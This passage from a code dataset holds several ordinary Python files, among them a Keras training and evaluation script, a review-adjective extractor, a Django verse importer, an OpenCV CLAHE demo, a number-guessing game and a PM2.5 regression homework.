down_reviews_df[down_reviews_df['char_count'].between(length[0], length[1])]\n    sample = sample[sample['sum_reviews'] >= rating_min]\n    \n    titles_index = sample.title.value_counts()[sample.title.value_counts()>=rating_min].index  \n    sample = sample[sample['title'].isin(titles_index)]\n    \n    sample_df = sample.groupby('title').apply(lambda x: x.sample(rating_min)).reset_index(drop = True)\n\n    return sample_df\n\n\ndef clean_reviews(sample_df):\n    '''\n    Desc.:\n    Clean 'reviewText', extracts adjectives for each review into a list in new column: review_adjectives\n    Input:\n    - sample_df: pd.DataFrame of sampled reviews\n    Output:\n    - identical to the input but with a new column storing each review's adjectives in a list\n    \n    '''\n    clean_sample = sample_df.copy()\n    clean_sample['reviewText']=clean_sample.reviewText.str.lower()\n    clean_sample['reviewText'] = clean_sample['reviewText'].str.replace('[^A-z ]','').str.replace(' +',' ').str.strip()\n    \n    def get_adjectives(text):\n        '''\n        Extracts adjectives\n        '''\n        blob = TextBlob(text)\n        return [ word for (word,tag) in blob.tags if tag == \"JJ\"]\n    \n    clean_sample['review_adjectives'] = clean_sample['reviewText'].apply(get_adjectives)\n    clean_sample_df = clean_sample.copy()\n    return clean_sample_df\n\n\n\n\ndef main():\n    dataload = DataLoad(data_dir)\n\n    meta_df = dataload.load_meta()\n    reviews_df = dataload.load_reviews()\n    merged_df = dataload.merge_reviews_meta()\n\n    sample_df = downsample_reviews(merged_df)\n    clean_sample_df = clean_reviews(sample_df)\n    return clean_sample_df\n\nif __name__ == \"__main__\":\n    clean_sample_df = main()\n    clean_sample_df.to_csv('sampled_reviews.csv', index = False)","sub_path":"reviews_ratings_engineering/generate_reviews_adjectives.py","file_name":"generate_reviews_adjectives.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"50868081","text":"from math import sqrt as s\r\nfrom collections import Counter as c\r\nn=int(input())\r\nli=[]\r\nwhile n%2 == 0:\r\n li.append(2)\r\n n//=2\r\nfor i in range(3,int(s(n))+1,2):\r\n while n%i == 0:\r\n li.append(i)\r\n n//=i\r\nif n>2:\r\n li.append(n)\r\nfor i,j in dict(c(li)).items():\r\n print(i,j)\r\n","sub_path":"power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585719293","text":"'''\ntrain.py = used for training a model\n'''\nimport os\nimport sys\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndir_path = dir_path[:dir_path.find('/phd')+4]\nif not dir_path in sys.path:\n sys.path.append(dir_path)\n print(sys.path)\n\nimport utilities.paths as paths\nDRIVE = paths.get_drive()\n\nfrom keras_code import predict, models\n\nimport datetime\n\nfrom keras import backend as K\nfrom sklearn.metrics import average_precision_score, classification_report, confusion_matrix\n\nfrom plotting.plot_pr_curve import plot_pr_curve\nfrom plotting.plot_confusion_matrix import plot_confusion_matrix\n\nimport utilities.paths as paths\nDRIVE = paths.get_drive()\nfrom keras_code import models\nfrom keras.models import Model\n\nimport numpy as np\nimport time\nimport os\nimport argparse\nimport math\nfrom utilities.logging import print_n_log, refresh_log\nimport utilities.paths as paths\nDRIVE = paths.get_drive()\n\n\ndef predict(model, split, batch_size=16, load_epoch=None, force_noneq=False, layers=['pred'], save_path=None, dataset=None):\n\n prediction_start_time = time.clock()\n\n # Load log\n assert (model is not None), \"model is None\"\n\n # get data\n if dataset is None:\n dataset = models.get_dataset(model_id, split, force_noneq=force_noneq, batch_size=batch_size)\n\n for layer_name in layers:\n if model.get_layer(layer_name) is None:\n model = Model(inputs=model.input, outputs=model.get_layer('predictions').output)\n else:\n model = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)\n\n # BATCH LOOP\n past = 0\n num_of_samples = dataset.number_of_samples()\n num_of_batches = int(math.floor(num_of_samples/float(batch_size)))\n sample_count = 0\n sum_loss = 0\n sum_count = 0\n c = 0\n Y = None\n P = None\n S = None\n for batch_count in range(0, num_of_batches):\n c += 1\n\n x, y, sid = dataset.get_batch_xy(True)\n\n sample_count += len(y)\n\n p = model.predict_on_batch(x)\n\n if Y is None:\n Y = y\n P = p\n S = sid\n else:\n Y = np.append(Y, y, axis=0)\n P = np.append(P, p, axis=0)\n S = np.append(S, sid, axis=0)\n\n if (int((float(batch_count) / num_of_batches) * 100) > past) or (batch_count == num_of_batches-1):\n\n etr = (num_of_samples - sample_count) * ((time.clock() - prediction_start_time) / float(sample_count))\n\n print(\"\\n%d .. 
Batch: %d / %d; Image: %d / %d; Total TR: %02d:%02d:%02d;\" % (\n past, batch_count, num_of_batches, sample_count, num_of_samples, int((etr / 60) / 60), int((etr / 60) % 60),\n int(etr % 60)))\n past += 10\n\n\n return Y, P, S\n\n\ndef test(model_id, identifier, model_path, split='test', batch_size=16, load_epoch=None, save_path=None, model=None, force_noneq=True):\n\n # set the channel order correctly\n if K.backend() == 'theano':\n K.set_image_dim_ordering('th')\n K.set_image_data_format('channels_first')\n else:\n K.set_image_dim_ordering('tf')\n K.set_image_data_format('channels_last')\n\n model_path = model_path\n\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n\n\n if force_noneq:\n ne = '-NE'\n else:\n ne = ''\n\n log = open(model_path + '/log_testing_' + split + '-e' + str(load_epoch) + ne + '.txt', \"a\")\n print_n_log(log, '\\n\\n\\nTesting initialised: {:%Y-%m-%d %H:%M:%S}\\n\\n'.format(datetime.datetime.now()))\n\n dataset = models.get_dataset(model_id, split, force_noneq=force_noneq, batch_size=batch_size)\n dataset.get_dataset_statistics(log)\n\n if os.path.exists(model_path + '/testing_stats-e' + str(load_epoch) + ne + '.npy'):\n [Y, P, S, labels] = np.load(\n model_path + '/testing_stats-e' + str(load_epoch) + ne + '.npy') # S might not be in some old files\n else:\n if model_id in ['MVK_50_04', 'MVK_50_05']:\n Y, P, S = predict(model, split, batch_size, load_epoch, force_noneq,\n ['pool_pred'], save_path) # TODO fix hardcode\n else:\n Y, P, S = predict(model, split, batch_size, load_epoch, force_noneq,\n ['pred'], save_path)\n\n labels = dataset.get_labels()\n\n np.save(model_path + '/testing_stats-e' + str(load_epoch) + ne + '.npy', [Y, P, S, labels])\n\n num_classes = len(labels)\n assert (np.shape(Y)[1] == np.shape(P)[1] == num_classes), \"Number of classes don't match\"\n\n # Build empty array for TP, FP, TN, FN counts for each class\n results = np.zeros((num_classes, 4), dtype=np.float32)\n\n # COUNT TP, FP, TN, FN\n for s in range(len(Y)):\n p = np.argmax(P[s])\n y = np.argmax(Y[s])\n\n if p == y: # TP\n for c in range(num_classes):\n if c == y: # add to TP count\n results[c][0] += 1\n else: # add to TN count for rest\n results[c][2] += 1\n else:\n for c in range(num_classes):\n if c == p: # add to FP count\n results[c][1] += 1\n elif c == y: # add to FN count\n results[c][3] += 1\n else: # add to TN count for rest\n results[c][2] += 1\n\n # Calculate overlap\n print_n_log(log, '\\n-=-=-=-=\\nOverlap\\n')\n mult = np.zeros((len(Y),num_classes))\n for s in range(len(Y)):\n for c in range(num_classes):\n if Y[s][c] > 0:\n mult[s][c] = min(P[s][c]/Y[s][c], 1)\n over = 0\n false_over = 0\n for c in range(num_classes):\n col = mult[:, c]\n over += np.average(col[col > 0])\n print_n_log(log, labels[c] + ' \\t ' + str(np.average(col[col > 0]))+'\\n')\n print_n_log(log, 'Avg: ' + str(over/len(labels))+'\\n')\n\n print_n_log(log, '\\nWrong Overlap\\n')\n mult = np.multiply(np.abs(Y-1), P)\n mult = np.zeros((len(Y),len(labels)))\n for s in range(len(Y)):\n for c in range(len(labels)):\n if Y[s][c] == 0:\n mult[s][c] = P[s][c]\n for c in range(len(labels)):\n col = mult[:, c]\n false_over += np.average(col[col > 0])\n print_n_log(log, labels[c] + ' \\t ' + str(np.average(col[col > 0]))+'\\n')\n\n print_n_log(log, 'Avg: ' + str(false_over/len(labels))+'\\n')\n\n # Display\n width = max(len(cn) for cn in labels)\n headers = [\"TP\", \"FP\", \"TN\", \"FN\", \"precision\", \"recall\", \"TNR\", \"Accuracy\"]\n fmt = '%% %ds' % width # first column: class name\n fmt 
+= ' '\n fmt += ' '.join(['% 9s' for _ in headers])\n fmt += '\\n'\n\n headers = [\"\"] + headers\n report = fmt % tuple(headers)\n report += '\\n'\n\n TPA = 0\n FPA = 0\n TNA = 0\n FNA = 0\n for c in range(len(labels)):\n TP = results[c][0]\n FP = results[c][1]\n TN = results[c][2]\n FN = results[c][3]\n TPA += TP\n FPA += FP\n TNA += TN\n FNA += FN\n\n values = [labels[c].rstrip()]\n vc = 0\n for v in (TP, FP, TN, FN, TP/float(TP+FP), TP/float(TP+FN), TN/float(TN+FP), (TP+TN)/float(TP+FP+TN+FN)):\n vc+=1\n if vc<5:\n values += [str(v)]\n else:\n values += [\"{0:0.{1}f}\".format(v, 4)]\n report += fmt % tuple(values)\n report += '\\n'\n\n print_n_log(log, report)\n\n\n Y_labs = np.argmax(Y, axis=1)\n P_labs = np.argmax(P, axis=1)\n\n print_n_log(log, classification_report(Y_labs, P_labs, target_names=labels, digits=4))\n\n # # Calculate APs for classes\n # APs = [[]] * num_classes\n # for c in range(num_classes):\n # # Add samples to class\n # samples = []\n # for s in range(len(Y)):\n # if np.argmax(P[s]) == c:\n # samples.append([P[s],np.argmax(Y[s])])\n #\n # # Rank the predictions based on confidence\n # samples.sort(key=lambda x: x[0][c], reverse=True)\n #\n # # Do the AP calculation per class\n # TP = 0\n # FP = 0\n # num = 0\n # for s in samples:\n # if np.argmax(s[0]) == s[1]:\n # TP += 1\n # num += (TP/float(TP+FP))\n # else:\n # FP += 1\n #\n # if TP == 0:\n # APs[c] = 0\n # else:\n # APs[c] = num/TP\n #\n # print_n_log(log, '\\nAverage Precsions per Class\\n')\n # for c in range(len(labels)):\n # print_n_log(log, \"\\t%s\\t%.4f\\n\" % (labels[c].rstrip(), APs[c]))\n # # Calculate mAP\n # mAP = sum(APs)/float(num_classes)\n # print_n_log(log, \"\\t%s\\t%.4f\\n\" % ('mAP', mAP))\n\n # Plot PR curve\n plot_pr_curve(Y, P, labels, save=model_path + '/prc_'+split+'-e'+str(load_epoch)+'.pdf')\n\n # Calculate APs\n APs = [[]] * num_classes\n for c in range(num_classes):\n APs[c] = average_precision_score(Y[:, c], P[:, c])\n\n print_n_log(log, '\\nAverage Precsions per Class\\n')\n for c in range(len(labels)):\n print_n_log(log, \"\\t%s\\t%.4f\\n\" % (labels[c].rstrip(), APs[c]))\n\n # Calculate mAP\n mAP = sum(APs)/float(num_classes)\n print_n_log(log, \"\\t%s\\t%.4f\\n\" % ('mAP', mAP))\n\n # print_n_log(log, \"\\t%s\\t%.4f\\n\" % ('mAP2', average_precision_score(Y, P))) # Same as above\n\n\n cm = plot_confusion_matrix(confusion_matrix(Y_labs,P_labs), classes=labels,\n title='Confusion matrix, without normalization', save=model_path + '/confmat_'+split+'-e'+str(load_epoch)+'.pdf')\n print_n_log(log, 'Confusion matrix, without normalization\\n')\n print_n_log(log, str(cm)+'\\n\\n')\n\n # cm = plot_confusion_matrix(confusion_matrix(Y_labs,P_labs), classes=labels, normalize=True,\n # title='Normalized confusion matrix')\n # print_n_log(log, 'Normalized confusion matrix')\n # print_n_log(log, str(cm)+'\\n\\n')\n\n log.close()\n\n\ndef train(model_id, identifier, model_path, nb_epoch=20, batch_size=16, load_epoch=None):\n\n # set the channel order correctly\n if K.backend() == 'theano':\n K.set_image_dim_ordering('th')\n K.set_image_data_format('channels_first')\n else:\n K.set_image_dim_ordering('tf')\n K.set_image_data_format('channels_last')\n\n training_start_time = time.clock()\n t_l = [[], []]\n v_l = [[], []]\n v_a = [[], []]\n\n model_path = model_path + model_id + '_' + identifier\n # Load log\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n log = open(model_path + '/log.txt', \"a\")\n print_n_log(log, '\\n\\n\\nTraining initialised: {:%Y-%m-%d 
%H:%M:%S}'.format(datetime.datetime.now()))\n\n # Check load epoch, if not specified or less than 0 get latest\n if (load_epoch is None) or (load_epoch < 0):\n load_epoch = 0\n for i in range(100,-1,-1):\n if os.path.isfile(model_path + '/' + model_id + '_' + identifier + '-e' + str(i) + '.h5'):\n load_epoch = i\n break\n\n if load_epoch == 0:\n print_n_log(log, '\\nTraining model from scratch...\\n\\n')\n model, output_classes = models.get_model_from_id(model_id, identifier, batch_size)\n else:\n print_n_log(log, '\\nLoading past model to train from:\\n')\n print_n_log(log, '\\n' + model_path + '/' + model_id + '_' + identifier + '-e' + str(load_epoch) + '.h5\\n\\n')\n [t_l, v_l, v_a] = np.load(model_path + '/training_stats-e'+str(load_epoch)+'.npy')\n model, output_classes = models.get_model_from_id(model_id, identifier, batch_size, load_epoch=load_epoch)\n\n assert (model is not None), \"model is None\"\n\n # Compile the model\n model = models.compile_model(model_id, model)\n\n # Load the dataset (train and val)\n dataset = models.get_dataset(model_id, 'train', force_noneq=False, batch_size=batch_size)\n dataset_val = models.get_dataset(model_id, 'val', force_noneq=False, batch_size=batch_size)\n\n class_weights = dataset.get_class_weights(type='balanced')\n\n dataset.get_dataset_statistics(log)\n dataset_val.get_dataset_statistics(log)\n # dataset.set_batch_size(batch_size)\n\n fig = None\n for e in range(load_epoch + 1, nb_epoch + 1):\n # refresh log every epoch\n log = refresh_log(log, model_path)\n print_n_log(log, \"\\n\\n--------------------------------------------\\nepoch %d\\n--------------------------------------------\\n\" % e)\n\n # Reset and Randomise the dataset per epoch\n dataset.reset()\n dataset.randomise()\n\n\n past = 0\n epoch_start_time = time.clock()\n\n # BATCH LOOP\n num_of_samples = dataset.number_of_samples()\n num_of_batches = int(math.floor(num_of_samples/float(batch_size)))\n sample_count = 0\n sum_loss = 0\n sum_count = 0\n c = 0\n for batch_count in range(0, num_of_batches):\n c += 1\n # Get data per batch\n x, y, sid = dataset.get_batch_xy(True)\n sample_count += len(y)\n # print(c)\n\n loss, acc = model.train_on_batch(x, y, class_weight=class_weights)\n\n # Sums since last print\n sum_loss += loss\n sum_count += 1\n\n if (int((float(batch_count) / num_of_batches) * 100) > past) or (batch_count == num_of_batches-1):\n\n etr = (num_of_samples - sample_count) * ((time.clock() - epoch_start_time) / float(sample_count))\n ttr = ((nb_epoch - e + 1) * num_of_samples - sample_count) / (((e-1) * num_of_samples + sample_count) / (time.clock() - training_start_time))\n\n\n log = refresh_log(log, model_path)\n print_n_log(log, \"\\n%d .. 
[loss: %.5f] Batch: %d / %d; Image: %d / %d; Epoch TR: %02d:%02d:%02d; Total TR: %02d:%02d:%02d;\" % (\n past, sum_loss / sum_count, batch_count, num_of_batches, sample_count, num_of_samples, int((etr / 60) / 60), int((etr / 60) % 60),\n int(etr % 60),\n int((ttr / 60) / 60), int((ttr / 60) % 60), int(ttr % 60)))\n\n t_l[0].append((e - 1) + past * .01)\n t_l[1].append(sum_loss / sum_count)\n\n # graph it\n # if not paths.is_cluster():\n # if fig:\n # plt.close()\n # fig, ax1 = plt.subplots()\n # ax1.plot(t_l[0], t_l[1], 'g-')\n # ax1.plot(v_l[0], v_l[1], 'b-')\n # ax1.set_ylim(bottom=0)\n # ax2 = ax1.twinx()\n # ax2.plot(v_a[0], v_a[1], 'r-')\n # ax2.set_ylim(top=1)\n\n past += 10\n sum_loss = 0\n sum_count = 0\n\n # if past > 0:\n # break\n\n # Validation\n print_n_log(log, '\\n------------------------ Validation results ------------------------\\n\\n')\n\n # reset and randomise validation dataset\n dataset_val.reset()\n dataset_val.randomise()\n\n past = 0\n val_metrics = []\n # soft = pickl---------------------------------------------------------------------------------e.load(open(DRIVE + 'DATASETS/VIDEO/TENNIS/SPLITS/S005/GROUND/all_soft_val_11_kv.pkl'))\n\n num_of_samples = dataset_val.number_of_samples()\n num_of_batches = int(math.floor(num_of_samples / float(batch_size)))\n sample_count = 0\n for batch_count in range(0, num_of_batches):\n\n x, y, sid = dataset_val.get_batch_xy(True)\n sample_count += len(y)\n\n if (int((float(batch_count) / num_of_batches) * 100) > past) or (batch_count == num_of_batches - 1):\n\n val_metrics.append(model.test_on_batch(x, y))\n\n if int((float(sample_count) / num_of_samples) * 100) > past:\n print_n_log(log, '.')\n past += 10\n\n val_results = np.average(val_metrics, axis=0)\n print_n_log(log, '\\n' + str(val_results))\n\n v_l[0].append(e)\n v_l[1].append(val_results[0])\n v_a[0].append(e)\n v_a[1].append(val_results[1])\n\n # Save Figure\n # fig.savefig(model_path + '/training.png')\n # if not paths.is_cluster():\n # fig.savefig(model_path + '/training.pdf')\n\n # Save Model\n # model.save_weights(model_path + '/' + model_id + '_' + identifier + '-e' + str(e) + '_weights.h5', overwrite=True)\n # if not paths.is_cluster():\n # model.save(model_path + '/' + model_id + '_' + identifier + '-e' + str(e) + '.h5', overwrite=True)\n\n test(model_id, identifier, model_path, 'test', batch_size, e, None, model=model, force_noneq=False)\n test(model_id, identifier, model_path, 'test', batch_size, e, None, model=model, force_noneq=True)\n\n # Save Training Stats\n np.save(model_path + '/training_stats-e'+str(e)+'.npy', [t_l, v_l, v_a])\n\n tt = time.clock() - training_start_time\n\n print_n_log(log, '\\n\\nTotal Time Taken: %02d:%02d:%02d;\\n' % (int((tt / 60) / 60), int((tt / 60) % 60), int(tt % 60)))\n\n print_n_log(log, '\\nTraining Finished\\n')\n log.close()\n\n\n\n\nif __name__ == \"__main__\":\n\n CLUSTER = paths.is_cluster() # AT END OF PROJECT MAYBE FIX SO\n\n if CLUSTER:\n p = argparse.ArgumentParser()\n\n p.add_argument('model_id', help='The model ID MV..._01')\n p.add_argument('identifier', help='The model identifier')\n p.add_argument('model_path', help='The path the model save location')\n p.add_argument('nb_epoch', type=int, default=20, help='The number of epochs (def: 20)')\n p.add_argument('batch_size', type=int, default=16, help='The batch size (def: 16)')\n p.add_argument('--load_epoch', help=\"load a particular saved epoch\")\n\n p = p.parse_args()\n train(p.model_id, p.identifier, p.model_path, p.nb_epoch, p.batch_size, p.load_epoch)\n 
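# outside the cluster, fall back to the hard-coded hyperparameters below for quick local runs\n    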
else:\n identifier = '00001'\n model_path = paths.get_model_path('KERAS')\n nb_epoch = 5\n batch_size = 16\n load_epoch = None\n\n model_id = 'MVSK_61_41'\n train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n model_id = 'MVSK_61_42'\n train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n # model_id = 'MVSK_65_46'\n # train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n # model_id = 'MVSK_65_47'\n # train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n","sub_path":"keras_code/train_test_nosave.py","file_name":"train_test_nosave.py","file_ext":"py","file_size_in_byte":18560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"212036634","text":"from django.core.management.base import BaseCommand, CommandError\n#from books.models import Verse\nimport csv\nimport os\nfrom pprint import pprint\nfrom books.models import *\nfrom django.template.defaultfilters import slugify\n\ndef make_verse(book, chapter, verse, text):\n \n \n v = Verse()\n v.book = book\n v.chapter = int(chapter)\n v.verse = int(verse)\n v.chapter_str = chapter\n v.verse_str = verse\n v.text = text\n v.save()\n print(v.book, v.chapter_str, v.verse_str, v.text)\n\nclass Command(BaseCommand):\n help = 'Commits a book from a text file properly formatted'\n\n def add_arguments(self, parser):\n parser.add_argument('--path', type=str)\n\n def handle(self, *args, **options):\n path = os.path.join('tmp',\"%s.csv\"%options['path'])\n \n if not os.path.exists(path):\n raise CommandError('\"%s\" does not exist' % path)\n \n key={}\n \n #get key\n reader = csv.reader(open('tmp/key_english.csv'))\n print(reader)\n for row in reader:\n if(row[0].isdigit()):\n key[row[0]] = row[1]\n \n \n \n #get bible verses\n reader = csv.reader(open(path))\n \n for row in reader:\n if(row[1].isdigit()):\n print(key[row[1]])\n \n book, created = Book.objects.get_or_create(slug=slugify(row[1]), name=row[1], canonical=True)\n \n make_verse(book, row[2], row[3], row[4])\n","sub_path":"workarea/management/commands/rip.py","file_name":"rip.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"233381188","text":"import cv2\nimport numpy as np\nfrom dataPath import DATA_PATH\n\n# Read color image\nfilename = DATA_PATH+\"images/night-sky.jpg\"\nim = cv2.imread(filename)\n\n# Convert to HSV\nimhsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)\nimhsvCLAHE = imhsv.copy()\n\n# Perform histogram equalization only on the V channel\nimhsv[:,:,2] = cv2.equalizeHist(imhsv[:,:,2])\n\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\nimhsvCLAHE[:,:,2] = clahe.apply(imhsvCLAHE[:,:,2])\n\n# Convert back to BGR format\nimEq = cv2.cvtColor(imhsv, cv2.COLOR_HSV2BGR)\nimEqCLAHE = cv2.cvtColor(imhsvCLAHE, cv2.COLOR_HSV2BGR)\n\ncv2.imshow(\"Original Image\", im)\ncv2.imshow(\"Histogram Equalized\",imEq)\ncv2.imshow(\"CLAHE\", imEqCLAHE)\ncv2.waitKey(0)\n","sub_path":"week4-python/ColorTransformations/CLAHE.py","file_name":"CLAHE.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"63600575","text":"import numpy as np\r\nimport scipy as sp\r\n#NO OTHER IMPORTS ALLOWED (However, you're allowed to import e.g. scipy.linalg)\r\n\r\ndef estInitialize():\r\n # Fill in whatever initialization you'd like here. 
This function generates\r\n # the internal state of the estimator at time 0. You may do whatever you\r\n # like here, but you must return something that is in the format as may be\r\n # used by your run() function.\r\n #\r\n\r\n #we make the internal state a list, with the first three elements the position\r\n # x, y; the angle theta; and our favourite color. \r\n x = 0\r\n y = 0\r\n theta = 0\r\n color = 'green' \r\n # note that there is *absolutely no prescribed format* for this internal state.\r\n # You can put in it whatever you like. Probably, you'll want to keep the position\r\n # and angle, and probably you'll remove the color.\r\n internalState = [x,\r\n y,\r\n theta, \r\n color\r\n ]\r\n\r\n return internalState\r\n\r\n","sub_path":"estInitialize.py","file_name":"estInitialize.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"650574097","text":"import random\n\nprint(\"Title:-------Hello world&Hello Python-------\")\nprint(\"Here is a game:guessNumber 2.0\")\n# When a guess is wrong, tell the player whether the secret number is bigger or smaller.\n# Give the player several chances to guess.\n# Pick the secret number at random.\n# Use an 'and' expression to combine the two loop conditions.\nguess=random.randint(1,10)\ntemp=int(input(\"input a number : \"))\nwrongNumber=0\nwhile (temp != guess)and(wrongNumber<4): \n if guess < temp:\n print(\"Big\")\n else:\n print(\"Small\")\n temp=int(input(\"input a number\"))\n wrongNumber=wrongNumber+1\nif guess==temp:\n print(\"Ok\")\nelse:\n print(\"The maximum number of errors has been reached\")\nprint(\"The game is end\")\n\n#------Tips 1------\n#type(parameter) shows the data type of the given argument\n#isinstance(parameter1,parameter2) compares the data types of the two given arguments; the return value is a Boolean\n#int(parameter) converts the given argument to an int and returns it.\n#str(), float() return string and float values respectively.\n\n#------Tips 2------\n# + (add), - (subtract), * (multiply), / (divide), // (floor division, e.g. 3//4==0), ** (power), % (modulo)\n# Basic arithmetic precedence: multiplication and division are evaluated before addition and subtraction.\n# The power operator binds tighter than operators on its left but looser than those on its right, e.g. -2 ** 4 == -16\n\n#------Tips 3------\n# Comparison operators: <, <=, >, >=, ==, !=\n# Logical operators: and, or, not\n\n# Overall precedence (highest to lowest):\n# **\n# unary + and -\n# *, /, //\n# +, -\n# <, <=, >, >=, ==, !=\n# not and or\n","sub_path":"Season2.py","file_name":"Season2.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"36587127","text":"\"\"\"\nGiven a machine that draws from 100 unique cards, what is the average number\nof draws to get a duplicate?\n\"\"\"\n\nimport math\n\ntotal = 0\nfor i in range(1, 101):\n total += (i - 1) / (math.factorial(101 - i) * 100 ** (i - 1)) * i # Probability\ntotal *= math.factorial(99)\n\nprint(total)\n","sub_path":"cool_programs/hundred_cards.py","file_name":"hundred_cards.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"378787379","text":"from compas_pattern.datastructures.mesh.mesh import Mesh\nfrom compas_pattern.datastructures.mesh.operations import mesh_move_vertex_to\nfrom compas.numerical import fd_numpy\nfrom compas_plotters.meshplotter import MeshPlotter\n\ndef find_form(mesh):\n vertices = [mesh.vertex_coordinates(vkey) for vkey in sorted(list(mesh.vertices()))]\n edges = list(mesh.edges())\n fixed = mesh.vertices_on_boundary()\n print(len(fixed))\n q = [1.0] * len(edges)\n loads = [[0.0, 0.0, 50.0 / len(vertices)]] * len(vertices)\n xyz, q, f, l, r = fd_numpy(vertices, edges, fixed, q, loads)\n for vkey, coordinates in zip(sorted(list(mesh.vertices())), xyz):\n mesh_move_vertex_to(mesh, coordinates, vkey)\n\nmesh = Mesh.from_json('/Users/Robin/Desktop/simple_mesh.json')\n# 
print(sorted(list(mesh.vertices())))\nfind_form(mesh)\n\n# for i in range(len(boundary)):\n# if boundary[i] != boundary2[i]:\n# print('!')\n\nplotter = MeshPlotter(mesh, figsize=(20, 20))\nplotter.draw_vertices(radius=0.1)\nplotter.draw_edges()\nplotter.draw_faces()\nplotter.show()\n","sub_path":"playground/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"198162962","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport csv \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\ndata = pd.read_csv(sys.argv[1],encoding='big5')\ndata = data.replace('NR', 0)\n\ntrain_Rdata = data.drop(data.columns[[0, 1, 2]], axis=1).apply(pd.to_numeric).as_matrix()\n\n\n# In[2]:\n\ntrain_Rdata = data.drop(data.columns[[0, 1, 2]], axis=1).apply(pd.to_numeric).as_matrix()\ndata1 = train_Rdata[0::18,:].reshape(1, 5760)\ndata2 = train_Rdata[1::18,:].reshape(1, 5760)\ndata3 = train_Rdata[2::18,:].reshape(1, 5760)\ndata4 = train_Rdata[3::18,:].reshape(1, 5760)\ndata5 = train_Rdata[4::18,:].reshape(1, 5760)\ndata6 = train_Rdata[5::18,:].reshape(1, 5760)\ndata7 = train_Rdata[6::18,:].reshape(1, 5760)\ndata8 = train_Rdata[7::18,:].reshape(1, 5760)\ndata9 = train_Rdata[8::18,:].reshape(1, 5760)\ndata10 = train_Rdata[9::18,:].reshape(1, 5760)\ndata11 = train_Rdata[10::18,:].reshape(1, 5760)\ndata12 = train_Rdata[11::18,:].reshape(1, 5760)\ndata13 = train_Rdata[12::18,:].reshape(1, 5760)\ndata14 = train_Rdata[13::18,:].reshape(1, 5760)\ndata15 = train_Rdata[14::18,:].reshape(1, 5760)\ndata16 = train_Rdata[15::18,:].reshape(1, 5760)\ndata17 = train_Rdata[16::18,:].reshape(1, 5760)\ndata18 = train_Rdata[17::18,:].reshape(1, 5760)\n\ntrain_data = np.vstack((data1, data2, data3, data4, data5, data6, data7, data8, data9, data10, data11, data12, data13, data14, data15, data16, data17, data18))\n\n\n# In[3]:\n\ntrain_x = [] #features 共5751組 一組有163個 第一個是1跟bias相乘\ntrain_y = [] #PM2.5 answer\n\ntrain_y.append(train_data[9, 9:])\ntrain_y= np.asarray(train_y).reshape(5751, 1)\n\nfor t in range(5751):\n train_x.append(1)\n for j in range(18):\n for i in range(9):\n train_x.append(train_data[j,i+t])\n\ntrain_x = np.asarray(train_x).reshape(5751, 163)\n\n\n# In[4]:\n\nwei = np.zeros((163,1))\nlr = 0.05\niteration = 80000\npre_gra = 0\n\nfor p in range(iteration):\n gradient = np.zeros_like(wei)\n gradient = (2*(train_x.dot(wei) - train_y).T.dot(train_x).T)\n pre_gra += gradient**2\n adg = np.sqrt(pre_gra)\n wei = wei - lr/adg*gradient\n\n\n# In[ ]:\n\ntest_data = pd.read_csv(sys.argv[2], encoding='big5', header = None)\ntest_data = test_data.replace('NR', 0)\ntest_data1 = np.matrix((test_data.values[:, 2:]), dtype='float64')\na = np.ones((240,1))\ntest_data1 = np.hstack((a, test_data1.reshape(240,162)))\npredict = test_data1.dot(wei)\nidvalue = test_data.ix[1::18, 0]\nidvalue = idvalue.reshape((240,1))\npredict = np.hstack((idvalue,predict))\ndf = pd.DataFrame(data = predict,columns = ['id','value'])\ndf\ndf.to_csv(sys.argv[3], index = False)\n\n","sub_path":"hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"197986982","text":"def Listing_06():\n# Listing 04.06 for statement using indexing\n A = np.random.randint(100, size=10)\n print('A = ' + str(A))\n theMax = A[0]\n theIndex = 0\n for index in np.arange(0,len(A)):\n x = A[index]\n if x > theMax:\n 
